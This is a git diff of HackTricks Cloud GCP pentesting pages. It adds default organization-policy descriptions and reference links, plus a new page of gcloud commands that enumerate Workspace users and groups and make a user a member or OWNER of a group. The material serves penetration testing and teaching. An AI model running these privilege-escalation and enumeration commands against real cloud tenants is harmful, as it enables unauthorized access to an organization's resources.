### Network Access diff --git a/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/README.md b/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/README.md index f518f8210f..41b2bed19d 100644 --- a/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/README.md +++ b/pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/README.md @@ -66,7 +66,7 @@ The exploit script for this method can be found [here](https://github.com/RhinoS ### `osconfig.patchDeployments.create` | `osconfig.patchJobs.exec` -If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. +If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. If you want to manually exploit this you will need to create either a [patch job](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_job.json) or [deployment](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_deployment.json) for a patch job run: @@ -112,6 +112,10 @@ Use this permission to **get the previous permissions.** `TODO` +## References + +* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-basic-information.md b/pentesting-cloud/gcp-security/gcp-basic-information.md index c3dca463d8..3f796dda9b 100644 --- a/pentesting-cloud/gcp-security/gcp-basic-information.md +++ b/pentesting-cloud/gcp-security/gcp-basic-information.md @@ -60,6 +60,68 @@ In order to **define** an organization policy, **you choose a** [**constraint**] There are many more constraints that give you fine-grained control of your organization's resources. For **more information, see the** [**list of all Organization Policy Service constraints**](https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints)**.** +### **Default Organization Policies** + +
+ +These are the policies that Google will add by default when setting up your GCP organization: + +**Access Management Policies** + +* **Domain restricted contacts:** Prevents adding users to Essential Contacts outside your specified domains. This limits Essential Contacts to only allow managed user identities in your selected domains to receive platform notifications. +* **Domain restricted sharing:** Prevents adding users to IAM policies outside your specified domains. This limits IAM policies to only allow managed user identities in your selected domains to access resources inside this organization. +* **Public access prevention:** Prevents Cloud Storage buckets from being exposed to the public. This ensures that a developer can't configure Cloud Storage buckets to have unauthenticated internet access. +* **Uniform bucket level access:** Prevents object-level access control lists (ACLs) in Cloud Storage buckets. This simplifies your access management by applying IAM policies consistently across all objects in Cloud Storage buckets. +* **Require OS login:** VMs created in new projects will have OS Login enabled. This lets you manage SSH access to your instances using IAM without needing to create and manage individual SSH keys. + +**Additional security policies for service accounts** + +* **Disable automatic IAM grants**: Prevents the default App Engine and Compute Engine service accounts from automatically being granted the Editor IAM role on a project at creation. This ensures service accounts don't receive overly-permissive IAM roles upon creation. +* **Disable service account key creation**: Prevents the creation of public service account keys. This helps reduce the risk of exposing persistent credentials. +* **Disable service account key upload**: Prevents the uploading of public service account keys. This helps reduce the risk of leaked or reused key material. + +**Secure VPC network configuration policies** + +* **Define allowed external IPs for VM instances**: Prevents the creation of Compute instances with a public IP, which can expose them to internet traffic. + + + +* **Disable VM nested virtualization**: Prevents the creation of nested VMs on Compute Engine VMs. This decreases the security risk of having unmonitored nested VMs. + + + +* **Disable VM serial port:** Prevents serial port access to Compute Engine VMs. This prevents input to a server’s serial port using the Compute Engine API. + + + +* **Restrict authorized networks on Cloud SQL instances:** Prevents public or non-internal network ranges from accessing your Cloud SQL databases. + + + +* **Restrict Protocol Forwarding Based on type of IP Address:** Prevents VM protocol forwarding for external IP addresses. + + + +* **Restrict Public IP access on Cloud SQL instances:** Prevents the creation of Cloud SQL instances with a public IP, which can expose them to internet traffic. + + + +* **Restrict shared VPC project lien removal:** Prevents the accidental deletion of Shared VPC host projects. + + + +* **Sets the internal DNS setting for new projects to Zonal DNS Only:** Prevents the use of a legacy DNS setting that has reduced service availability. + + + +* **Skip default network creation:** Prevents automatic creation of the default VPC network and related resources. This avoids overly-permissive default firewall rules. + + + +* **Disable VPC External IPv6 usage:** Prevents the creation of external IPv6 subnets, which can be exposed to unauthorized internet access. + +
+ ## **IAM Roles** These are like IAM policies in AWS as **each role contains a set of permissions.** @@ -96,11 +158,21 @@ You can access Workspaces **users and groups in** [**https://admin.google.com**] When an organisation is created several groups are **strongly suggested to be created.** If you manage any of them you might have compromised all or an important part of the organization: -
GroupFunction
grp-gcp-organization-admins
(group or individual accounts required for checklist)		Administering any resource that belongs to the organization. Assign this role sparingly; org admins have access to all of your Google Cloud resources. Alternatively, because this function is highly privileged, consider using individual accounts instead of creating a group.
grp-gcp-network-admins
(required for checklist)		Creating networks, subnets, firewall rules, and network devices such as Cloud Router, Cloud VPN, and cloud load balancers.
grp-gcp-billing-admins
(required for checklist)		Setting up billing accounts and monitoring their usage.
grp-gcp-developers
(required for checklist)		Designing, coding, and testing applications.
grp-gcp-security-admins
Establishing and managing security policies for the entire organization, including access management and organization constraint policies. See the Google Cloud security foundations guide for more information about planning your Google Cloud security infrastructure.
grp-gcp-devopsCreating or managing end-to-end pipelines that support continuous integration and delivery, monitoring, and system provisioning.
grp-gcp-billing-viewerMonitoring the spend on projects. Typical members are part of the finance team.
grp-gcp-platform-viewerReviewing resource information across the Google Cloud organization.
grp-gcp-security-reviewerReviewing cloud security.
grp-gcp-network-viewerReviewing network configurations.
grp-gcp-audit-viewerViewing audit logs.
grp-gcp-scc-adminAdministering Security Command Center.
grp-gcp-secrets-adminManaging secrets in Secret Manager.
+
GroupFunction
gcp-organization-admins
(group or individual accounts required for checklist)		Administering any resource that belongs to the organization. Assign this role sparingly; org admins have access to all of your Google Cloud resources. Alternatively, because this function is highly privileged, consider using individual accounts instead of creating a group.
gcp-network-admins
(required for checklist)		Creating networks, subnets, firewall rules, and network devices such as Cloud Router, Cloud VPN, and cloud load balancers.
gcp-billing-admins
(required for checklist)		Setting up billing accounts and monitoring their usage.
gcp-developers
(required for checklist)		Designing, coding, and testing applications.
gcp-security-admins
Establishing and managing security policies for the entire organization, including access management and organization constraint policies. See the Google Cloud security foundations guide for more information about planning your Google Cloud security infrastructure.
gcp-devopsCreating or managing end-to-end pipelines that support continuous integration and delivery, monitoring, and system provisioning.
gcp-logging-admins
gcp-logging-viewers
gcp-monitor-admins
gcp-billing-viewer
(no longer by default)		Monitoring the spend on projects. Typical members are part of the finance team.
gcp-platform-viewer
(no longer by default)		Reviewing resource information across the Google Cloud organization.
gcp-security-reviewer
(no longer by default)		Reviewing cloud security.
gcp-network-viewer
(no longer by default)		Reviewing network configurations.
grp-gcp-audit-viewer
(no longer by default)		Viewing audit logs.
gcp-scc-admin
(no longer by default)		Administering Security Command Center.
gcp-secrets-admin
(no longer by default)		Managing secrets in Secret Manager.
## **Default Password Policy** -
+* Enforce strong passwords +* Between 8 and 100 characters +* No reuse +* No expiration +* If people is accessing Workspace through a third party provider, these requirements aren't applied. + +
+ +
+ + ## **Service accounts** diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md index e734a211df..2711ea5858 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md @@ -55,6 +55,10 @@ Give yourself any of the previous .update or .create privileges to escalate. An attacker with **write permissions over the bucket** where the Cloud Functions code is stored will be able to **modify the code overwriting** the `function_code.zip` and will be able to **execute arbitrary** code once it's executed. +## References + +* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md new file mode 100644 index 0000000000..c45172e7cb --- /dev/null +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md @@ -0,0 +1,62 @@ +# GCP - Cloudidentity Privesc + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+ +## Cloudidentity + +For more information about the cloudidentity service, check this page: + +{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} +[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) +{% endcontent-ref %} + +### Add yourself to a group + +If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group: + +{% code overflow="wrap" %} +```bash +gcloud identity groups memberships add --group-email --member-email [--roles OWNER] +# If --roles isn't specified you will get MEMBER +``` +{% endcode %} + +### Modify group membership + +If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of: + +{% code overflow="wrap" %} +```bash +# Check the current membership level +gcloud identity groups memberships describe --member-email --group-email + +# If not OWNER try +gcloud identity groups memberships modify-membership-roles --group-email --member-email --add-roles=OWNER +``` +{% endcode %} + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md index 811afbe289..fac443e976 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md @@ -34,6 +34,10 @@ Check a script to automate the [**creation, exploit and cleaning of a vuln envir This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous _deploymentmanager.deployments.create_ section. +## References + +* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md index eb9d08207f..b04e676ef2 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md @@ -116,6 +116,10 @@ Some services that support authentication via this kind of tokens are: You can find an example on how to create and OpenID token behalf a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py). +## References + +* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md index db4af53c98..c90d5b3d54 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md @@ -26,6 +26,10 @@ The screenshot above shows that the _appengine.disableCodeDownload_ constraint i The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py). +## References + +* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md index 4f6097473b..0a97ff9249 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md @@ -74,6 +74,10 @@ gcloud beta run jobs update hacked \ Give yourself the previous permissions. +## References + +* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md index fc8310527c..b7f66cbd95 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md @@ -44,6 +44,14 @@ The screenshot above shows that the request is exactly the same as before, it ju The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.list.py). +### **`serviceusage.services.enable`** , **`serviceusage.services.use`** + +With these permissions an attacker can enable and use new services in the project. This could allow an attacker to enable service like admin or cloudidentity to access Workspace information, or other services to access interesting data. + +## **References** + +* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) +
Support HackTricks and get benefits! diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md index 2eb4ce4e94..cd76489d57 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md @@ -81,6 +81,10 @@ If you can modify or add objects in buckets, you might be able to escalate your * **Google Container Registry** stores the images inside buckets, if you can **write those buckets** you might be able to **move laterally to where those buckets are being run.** +## **References** + +* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md index 1e1f54e6f2..e4c72f214b 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md +++ b/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md @@ -1,4 +1,4 @@ -# GCP - IAM, Ppals & Org Policies Enum +# GCP - IAM, Principals & Org Policies Enum
@@ -40,31 +40,44 @@ For an intro about how Users & Groups work in GCP check: ### Enumeration -With the permissions **`serviceusage.services.enable`** and **`serviceusage.services.use`**it's possible to **enable services** in a project and use them. +With the permissions **`serviceusage.services.enable`** and **`serviceusage.services.use`** it's possible to **enable services** in a project and use them. If you can **enable the `admin` service** and if your user has **enough privileges in workspace,** you could **enumerate all groups & users** with the following lines.\ Even if it says **`identity groups`**, it also returns **users without any groups**: +{% code overflow="wrap" %} ```bash # Enable admin gcloud services enable admin.googleapis.com -# List all users & groups +gcloud services enable cloudidentity.googleapis.com + +# Using admin.googleapis.com +## List all users gcloud organizations list #The DIRECTORY_CUSTOMER_ID is the Workspace ID gcloud beta identity groups preview --customer -## Group Members -gcloud identity groups memberships search-transitive-memberships --group-email=email@group.com + +# Using cloudidentity.googleapis.com +## List groups of a user +gcloud identity groups memberships search-transitive-groups --member-email --labels=cloudidentity.googleapis.com/groups.discussion_forum + +## List Group Members +gcloud identity groups memberships list --group-email= +### Make it transitive +gcloud identity groups memberships search-transitive-memberships --group-email= + +## Get a graph (if you have enough permissions) +gcloud identity groups memberships get-membership-graph --member-email= --labels=cloudidentity.googleapis.com/groups.discussion_forum ``` +{% endcode %} + +{% hint style="success" %} +In the previous examples the param `--labels` is required, so a generic value is used (it's not requires if you used the API directly like [**PurplePanda does in here**](https://github.com/carlospolop/PurplePanda/blob/master/intel/google/discovery/disc\_groups\_users.py). +{% endhint %} Even with the admin service enable, it's possible that you get an error enumerating them because your compromised workspace user doesn't have enough permissions:
-If you can enable the service **`cloudidentity.googleapli.com`** if disabled, you could use it to **enumerate groups** (like it's done in PurplePanda in [here](https://github.com/carlospolop/PurplePanda/blob/master/intel/google/discovery/disc\_groups\_users.py)): - -``` -gcloud services enable cloudidentity.googleapis.com -``` - ## IAM Check [**this for basic information about IAM**](../gcp-basic-information.md#iam-roles).